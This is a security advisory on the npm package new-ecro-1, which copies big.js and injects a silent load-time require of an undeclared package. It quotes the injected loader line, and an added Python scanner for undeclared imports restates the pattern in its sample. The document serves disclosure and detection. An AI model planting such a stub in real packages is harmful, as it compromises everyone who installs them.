MAL-2026-6198
Malicious code in new-ecro-1 (npm)
Details
## Source: amazon-inspector (0c4e172aa83f2b8742fb014ea649490c87815573cab692ea74eb402ee23f935c)

Package `new-ecro-1` impersonates the legitimate `big.js` library by shipping its source verbatim (banner, license, and homepage pointing at MikeMcl/big.js).

Inside the load-time IIFE in both `big.js` and `big.mjs` at line 606, an injected block silently executes `const doc = require("parket-slot"); doc.from_str().then(e => {}).catch(e => {})`, wrapped in a try/catch that swallows all errors.

The `parket-slot` package is not declared in this manifest's `dependencies` (which instead lists `new-solt-1`), so the require resolves to whatever loader-controlled package happens to be present in the surrounding install tree, executing its `from_str()` on import.

The combination of name-impersonation, undeclared cross-package require, and silent error suppression is a loader stub for attacker-controlled code that runs the moment any consumer imports this module.
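The undeclared cross-package `require` described above is something a consumer can check for before installing or auditing a package. The script below is an added example, not code from the advisory source or from the `new-ecro-1`/`big.js` packages: it extracts `require()` and ES `import` specifiers from JavaScript source, strips subpaths and the `node:` prefix, and reports every bare specifier that is neither a Node built-in nor declared in the manifest's `dependencies`, `peerDependencies` or `optionalDependencies`. The manifest and source in `SAMPLE_MANIFEST`/`SAMPLE_SOURCE` are constructed stand-ins (placeholder package names), and the built-in list is a partial one assumed for the example.

```python
import json
import os
import re

# Partial set of Node core modules assumed for this example; these never need declaring.
NODE_BUILTINS = {
    "assert", "buffer", "child_process", "crypto", "events", "fs", "http",
    "https", "net", "os", "path", "stream", "url", "util", "zlib",
}

# CommonJS require('x'), ES "import ... from 'x'" / "export ... from 'x'", and bare "import 'x'".
REQUIRE_RE = re.compile(r"""\brequire\(\s*(['"])([^'"]+)\1\s*\)""")
IMPORT_FROM_RE = re.compile(r"""\b(?:import|export)\b[^;'"]*?\bfrom\s*(['"])([^'"]+)\1""")
SIDE_EFFECT_IMPORT_RE = re.compile(r"""\bimport\s*(['"])([^'"]+)\1""")


def package_name(spec):
    """Reduce a module specifier to its package name: '@s/p/sub' -> '@s/p', 'p/sub' -> 'p'."""
    if spec.startswith("@"):
        return "/".join(spec.split("/")[:2])
    return spec.split("/")[0]


def declared_dependencies(manifest):
    """All package names the manifest legitimately pulls in at install time."""
    names = set()
    for field in ("dependencies", "peerDependencies", "optionalDependencies"):
        names.update(manifest.get(field, {}).keys())
    return names


def find_undeclared_requires(source, manifest):
    """Return sorted (package, line) pairs for imports the manifest does not declare."""
    declared = declared_dependencies(manifest)
    found = set()
    for regex in (REQUIRE_RE, IMPORT_FROM_RE, SIDE_EFFECT_IMPORT_RE):
        for m in regex.finditer(source):
            spec = m.group(2)
            if spec.startswith((".", "/")):      # local file, not a package
                continue
            name = package_name(spec.removeprefix("node:"))
            if name in NODE_BUILTINS or name in declared:
                continue
            line = source.count("\n", 0, m.start()) + 1
            found.add((name, line))
    return sorted(found, key=lambda t: (t[1], t[0]))


def scan_package(root):
    """Scan an unpacked package directory; returns {relative_path: [(package, line), ...]}."""
    with open(os.path.join(root, "package.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != "node_modules"]
        for fn in filenames:
            if fn.endswith((".js", ".mjs", ".cjs")):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_undeclared_requires(fh.read(), manifest)
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report


# Constructed sample: a manifest that declares one dependency, and a load-time IIFE
# that quietly requires a package the manifest never mentions (placeholder names).
SAMPLE_MANIFEST = {
    "name": "example-pkg",
    "dependencies": {"declared-helper": "^1.0.0"},
}

SAMPLE_SOURCE = """\
;(function (GLOBAL) {
  'use strict';
  var fs = require('fs');
  var helper = require('declared-helper');
  try {
    const doc = require('undeclared-loader-pkg');
    doc.load().then(e => {}).catch(e => {});
  } catch (e) {}
})(this);
"""

if __name__ == "__main__":
    for name, line in find_undeclared_requires(SAMPLE_SOURCE, SAMPLE_MANIFEST):
        print(f"undeclared import of '{name}' at line {line}")
```

Run against an unpacked tarball with `scan_package("path/to/package")`; a hit inside a file that otherwise mirrors a well-known library is the pattern the advisory describes. The regexes are deliberately simple and will miss obfuscated or computed specifiers, so treat an empty result as "nothing obvious", not as a clean bill of health.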
Affected packages
No fixed version published yet for new-ecro-1 (npm). Pin to a known-safe version or switch to an alternative.